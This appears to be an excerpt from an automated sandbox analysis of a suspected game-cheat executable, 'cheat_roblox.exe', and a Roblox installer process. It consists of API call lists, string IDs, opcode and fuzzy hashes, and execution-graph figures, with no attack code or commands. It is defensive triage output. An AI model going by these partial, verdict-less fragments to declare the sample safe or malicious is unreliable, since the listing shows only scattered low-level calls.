                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6E7E474F3,?,?,?,00007FF6E7E4525E,?,?,?,00007FF6E7E45219), ref: 00007FF6E7E47371
                                                                                                                  • GetLastError.KERNEL32(?,?,00000000,00007FF6E7E474F3,?,?,?,00007FF6E7E4525E,?,?,?,00007FF6E7E45219), ref: 00007FF6E7E4737F
                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6E7E474F3,?,?,?,00007FF6E7E4525E,?,?,?,00007FF6E7E45219), ref: 00007FF6E7E473A9
                                                                                                                  • FreeLibrary.KERNEL32(?,?,00000000,00007FF6E7E474F3,?,?,?,00007FF6E7E4525E,?,?,?,00007FF6E7E45219), ref: 00007FF6E7E473EF
                                                                                                                  • GetProcAddress.KERNEL32(?,?,00000000,00007FF6E7E474F3,?,?,?,00007FF6E7E4525E,?,?,?,00007FF6E7E45219), ref: 00007FF6E7E473FB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                  • String ID: api-ms-
                                                                                                                  • API String ID: 2559590344-2084034818
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(?,?,?,00007FF6E7E41573,?,?,?,00007FF6E7E4192A), ref: 00007FF6E7E4162B
                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF6E7E41573,?,?,?,00007FF6E7E4192A), ref: 00007FF6E7E41648
                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF6E7E41573,?,?,?,00007FF6E7E4192A), ref: 00007FF6E7E41664
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                  • API String ID: 667068680-1718035505
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF6E7E251A4: GetVersionExW.KERNEL32 ref: 00007FF6E7E251D5
                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6E7E15AB4), ref: 00007FF6E7E2ED8C
                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6E7E15AB4), ref: 00007FF6E7E2ED98
                                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6E7E15AB4), ref: 00007FF6E7E2EDA8
                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6E7E15AB4), ref: 00007FF6E7E2EDB6
                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6E7E15AB4), ref: 00007FF6E7E2EDC4
                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6E7E15AB4), ref: 00007FF6E7E2EE05
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2092733347-0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2092733347-0
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID: .rar$exe$rar$sfx
                                                                                                                  • API String ID: 3668304517-630704357
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: abort$CallEncodePointerTranslator
                                                                                                                  • String ID: MOC$RCC
                                                                                                                  • API String ID: 2889003569-2084237596
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                  • String ID: csm$f
                                                                                                                  • API String ID: 2395640692-629598281
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
                                                                                                                  • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                  • API String ID: 2102711378-639343689
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Show$Rect
                                                                                                                  • String ID: RarHtmlClassName
                                                                                                                  • API String ID: 2396740005-1658105358
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                  • API String ID: 0-56093855
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3215553584-0
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2398171386-0
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3659116390-0
                                                                                                                  • Opcode ID: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                                                                                                                  • Instruction ID: f961f7f4080ae34af57909e06e21e3af44933a1033810fc058120509a9caf730
                                                                                                                  • Opcode Fuzzy Hash: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                                                                                                                  • Instruction Fuzzy Hash: B051E073A18A5589E710CB25E8403AC3BB1FB45798F148135CEAE97B98DF3ED146C706
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$AllocString
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 262959230-0
                                                                                                                  • Opcode ID: 8c2dc27bb1e4af113538b7172bb6dd323e96cb8c94470b0dbd49c9d6f404eed7
                                                                                                                  • Instruction ID: fa5709f2062de903be3c826c22916e17991858e5c06925ff46c70176fbddd723
                                                                                                                  • Opcode Fuzzy Hash: 8c2dc27bb1e4af113538b7172bb6dd323e96cb8c94470b0dbd49c9d6f404eed7
                                                                                                                  • Instruction Fuzzy Hash: 5141BF23A0964A8AEF149F21E4403782291EF44BA4F544634EABDC77D5EF3EE1539309
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 190572456-0
                                                                                                                  • Opcode ID: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                                                                                                                  • Instruction ID: f05a5ec56e6f65322ac58aa9d23789e5c0accd0f0d885b82640189500dfb535d
                                                                                                                  • Opcode Fuzzy Hash: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                                                                                                                  • Instruction Fuzzy Hash: 1941C033B19A4281FA198B52E9007756296BB04B90F1D4535DEBDCB644EF3EE501934A
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: _set_statfp
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1156100317-0
                                                                                                                  • Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                                                                  • Instruction ID: 1d47dc972bf45c50422c69f7a8fb773be33edf70f0995802d245a9dd530f4014
                                                                                                                  • Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                                                                  • Instruction Fuzzy Hash: 89118F37E1CB0F81F6541324F54237916436F553A0E484634EAFECA6D6DE6EB640660F
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3621893840-0
                                                                                                                  • Opcode ID: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                                                                                                                  • Instruction ID: 110d8460b1beea5c260b2b8b247b0c1c5ebe1d225c7739cfd5cc0d4eb3478c8f
                                                                                                                  • Opcode Fuzzy Hash: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                                                                                                                  • Instruction Fuzzy Hash: F4F04F33F2844792F7109721E459B362311FFA4B05F441130E59EC58A5DF2ED149C705
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: __except_validate_context_recordabort
                                                                                                                  • String ID: csm$csm
                                                                                                                  • API String ID: 746414643-3733052814
                                                                                                                  • Opcode ID: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                                                                                                                  • Instruction ID: 9b39da8795704562c565279620d912b55913018f2c87b01ce66c200e04929ba0
                                                                                                                  • Opcode Fuzzy Hash: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                                                                                                                  • Instruction Fuzzy Hash: 4371C173A0868186DB608F25D05077D7BB0FB41B88F148136DAEC87A89EF3DD592D74A
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                  • String ID: $*
                                                                                                                  • API String ID: 3215553584-3982473090
                                                                                                                  • Opcode ID: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
                                                                                                                  • Instruction ID: 5b27fa82a556aab6266c0f62f981d0427155826cac670686b043f708ea94c0ff
                                                                                                                  • Opcode Fuzzy Hash: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
                                                                                                                  • Instruction Fuzzy Hash: 7851487390CA528AE7658F28C45537C37A1FB05B18F141136C6EAC5299EF3ED483E68E
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$StringType
                                                                                                                  • String ID: $%s
                                                                                                                  • API String ID: 3586891840-3791308623
                                                                                                                  • Opcode ID: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
                                                                                                                  • Instruction ID: 060a50e47c03aaf84de3f19240913f5e3e362453f8f1fdf57d068bfe5d5e89bd
                                                                                                                  • Opcode Fuzzy Hash: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
                                                                                                                  • Instruction Fuzzy Hash: 0341A933B15B8589EB618F25E8003A96392FB54BA8F480235DEAD877C5DF3DE4418346
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                                                                                  • String ID: csm
                                                                                                                  • API String ID: 2466640111-1018135373
                                                                                                                  • Opcode ID: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                                                                                  • Instruction ID: d119752887751ef38cf0948dfcec64587711e596554fa90909466a092f18e28e
                                                                                                                  • Opcode Fuzzy Hash: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                                                                                  • Instruction Fuzzy Hash: ED51497361874287D620AB16E04036E77B4FB89B90F040535EB9D87B55EF3DE462EB0A
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                  • String ID: U
                                                                                                                  • API String ID: 2456169464-4171548499
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: ObjectRelease
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1429681911-3916222277
                                                                                                                  APIs
                                                                                                                  • InitializeCriticalSection.KERNEL32(?,?,?,00007FF6E7E3317F,?,?,00001000,00007FF6E7E1E51D), ref: 00007FF6E7E2E8BB
                                                                                                                  • CreateSemaphoreW.KERNEL32(?,?,?,00007FF6E7E3317F,?,?,00001000,00007FF6E7E1E51D), ref: 00007FF6E7E2E8CB
                                                                                                                  • CreateEventW.KERNEL32(?,?,?,00007FF6E7E3317F,?,?,00001000,00007FF6E7E1E51D), ref: 00007FF6E7E2E8E4
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                  • String ID: Thread pool initialization failed.
                                                                                                                  • API String ID: 3340455307-2182114853
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: CapsDeviceRelease
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 127614599-3916222277
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$FileTime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1137671866-0
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1452528299-0
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1077098981-0
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4141327611-0
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: FileMove_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3823481717-0
                                                                                                                  APIs
                                                                                                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6E7E4C45B), ref: 00007FF6E7E50B91
                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6E7E4C45B), ref: 00007FF6E7E50BF3
                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6E7E4C45B), ref: 00007FF6E7E50C2D
                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6E7E4C45B), ref: 00007FF6E7E50C57
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1557788787-0
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$abort
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1447195878-0
                                                                                                                  Similarity
                                                                                                                  • API ID: CapsDevice$Release
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1035833867-0
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID: DXGIDebug.dll
                                                                                                                  • API String ID: 3668304517-540382549
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                  • String ID: e+000$gfff
                                                                                                                  • API String ID: 3215553584-3030954782
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                                                                                  • String ID: SIZE
                                                                                                                  • API String ID: 449872665-3243624926
                                                                                                                  Similarity
                                                                                                                  • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                                  • String ID: C:\Users\user\Desktop\cheat_roblox.exe
                                                                                                                  • API String ID: 3307058713-3685224637
                                                                                                                  Similarity
                                                                                                                  • API ID: Item$Text$Dialog
                                                                                                                  • String ID: ASKNEXTVOL
                                                                                                                  • API String ID: 2638039312-3402441367
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide_snwprintf
                                                                                                                  • String ID: $%s$@%s
                                                                                                                  • API String ID: 2650857296-834177443
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileHandleType
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 3000768030-2766056989
                                                                                                                  APIs
                                                                                                                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6E7E41D3E), ref: 00007FF6E7E440BC
                                                                                                                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6E7E41D3E), ref: 00007FF6E7E44102
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                  • String ID: csm
                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                  APIs
                                                                                                                  • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF6E7E2E95F,?,?,?,00007FF6E7E2463A,?,?,?), ref: 00007FF6E7E2EA63
                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6E7E2E95F,?,?,?,00007FF6E7E2463A,?,?,?), ref: 00007FF6E7E2EA6E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastObjectSingleWait
                                                                                                                  • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                  • API String ID: 1211598281-2248577382
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FindHandleModuleResource
                                                                                                                  • String ID: RTL
                                                                                                                  • API String ID: 3537982541-834975271

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:21%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:2.1%
                                                                                                                  Total number of Nodes:485
                                                                                                                  Total number of Limit Nodes:8
5 API calls 2009->2010 2010->2011

                                                                                                                  Callgraph

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.1510946174.0000000000DF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_df0000_RobloxPlayerInstaller.jbxd
                                                                                                                  Similarity
                                                                                                                  • Opcode ID: d25d989f1fe4a918cfae98fc46616e2cda2be0900d2787bccc965bad06740c5d
                                                                                                                  • Instruction ID: 7105f6525cf78442f4663c3c7f2771360481dd816cabf2de247b10d01351ddef
                                                                                                                  • Opcode Fuzzy Hash: d25d989f1fe4a918cfae98fc46616e2cda2be0900d2787bccc965bad06740c5d
                                                                                                                  • Instruction Fuzzy Hash: B8F03076A11224ABCF2BCA9CE405A9973A9EB49B65F114096F5019B281CBB4DD00DBD0

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,5791E0C7,?,0110CB0C,?,?,?,00000000), ref: 0110CAC0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.1510946174.0000000000DF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_df0000_RobloxPlayerInstaller.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary
                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                  • API String ID: 3664257935-537541572
                                                                                                                  • Opcode ID: d00b48f11b9680b11205625104f708d162776c1891ec7162337ed46cc0436f02
                                                                                                                  • Instruction ID: e56e11c510ef7bf2529b194b279bf9a548b57e09907b1283168ca8a89124e767
                                                                                                                  • Opcode Fuzzy Hash: d00b48f11b9680b11205625104f708d162776c1891ec7162337ed46cc0436f02
                                                                                                                  • Instruction Fuzzy Hash: BF21EB76E00215EBD73BDB69EC41B5A3768EB417A0B150764F912A72C4E7B0E981CBE0

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(0121C1C8,0000000C), ref: 010F4452
                                                                                                                  • ExitThread.KERNEL32 ref: 010F4459
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.1510946174.0000000000DF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000194A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000199B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001EFE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F3E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F41000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1512774662.0000000001F43000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_df0000_RobloxPlayerInstaller.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorExitLastThread
                                                                                                                  • String ID: !
                                                                                                                  • API String ID: 1611280651-1801386649
                                                                                                                  • Opcode ID: 04d8627d4491934ac82f5f9384a4795c75e0480b9044e607f6c164fbacf580db
                                                                                                                  • Instruction ID: b91f047f8bbe3944eeca720f36c1328c7a7d7d2fb3d559671eba610a2f639022
                                                                                                                  • Opcode Fuzzy Hash: 04d8627d4491934ac82f5f9384a4795c75e0480b9044e607f6c164fbacf580db
                                                                                                                  • Instruction Fuzzy Hash: D9F022B0940306AFDF1AEFB0C809A6F3BB0EF00610F204288F42197295CF706940DB51

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 40 10f44f4-10f4501 call 110a316 43 10f4503-10f450b 40->43 44 10f4541-10f4544 ExitThread 40->44 43->44 45 10f450d-10f4511 43->45 46 10f4518-10f451e 45->46 47 10f4513 call 110d03e 45->47 49 10f452b-10f4531 46->49 50 10f4520-10f4522 46->50 47->46 49->44 52 10f4533-10f4535 49->52 50->49 51 10f4524-10f4525 CloseHandle 50->51 51->49 52->44 53 10f4537-10f453b FreeLibraryAndExitThread 52->53 53->44
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0110A316: GetLastError.KERNEL32(00000000,?,010EE677,0110B9ED,?,?,0110A212,00000001,00000364,?,00000006,000000FF,?,010F4464,0121C1C8,0000000C), ref: 0110A31A
                                                                                                                    • Part of subcall function 0110A316: SetLastError.KERNEL32(00000000), ref: 0110A3BC
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,010F462B,?,?,010F449D,00000000), ref: 010F4525
                                                                                                                  • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,010F462B,?,?,010F449D,00000000), ref: 010F453B
                                                                                                                  • ExitThread.KERNEL32 ref: 010F4544
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.1510946174.0000000000DF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_df0000_RobloxPlayerInstaller.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1991824761-0
                                                                                                                  • Opcode ID: 73739d5754babbd4688407685b059e660e9cd9735eb6f9b17e1855572533f0d5
                                                                                                                  • Instruction ID: 3e42a1571124b693fb1e17e141bab45d6bf25e5d98cd7cbe809b15ad1f6e0d9d
                                                                                                                  • Opcode Fuzzy Hash: 73739d5754babbd4688407685b059e660e9cd9735eb6f9b17e1855572533f0d5
                                                                                                                  • Instruction Fuzzy Hash: A3F03A304006016BEF75AB69C80DA5B3ED9AF00A64B0847A8BEA5CBDA5CBB0D9818650

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32(00000002,?,01104375,010F466F,010F466F,?,00000002,5791E0C7,010F466F,00000002), ref: 0110438C
                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,01104375,010F466F,010F466F,?,00000002,5791E0C7,010F466F,00000002), ref: 01104393
                                                                                                                  • ExitProcess.KERNEL32 ref: 011043A5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.1510946174.0000000000DF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_df0000_RobloxPlayerInstaller.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1703294689-0
                                                                                                                  • Opcode ID: 8e81de79567502aa6ef6ab9844a7750c14a6f2053c98657547ce25b67fa5ec76
                                                                                                                  • Instruction ID: 5c62ff90ef29fcaad2db3909151f440c8acf05d3bf9baab07b6619d1a8e7200f
                                                                                                                  • Opcode Fuzzy Hash: 8e81de79567502aa6ef6ab9844a7750c14a6f2053c98657547ce25b67fa5ec76
                                                                                                                  • Instruction Fuzzy Hash: ECD09E71404618AFCF1A2FA1D84D9593F25AF402457145124BB194E569CBB199D1DB90

                                                                                                                  Control-flow Graph

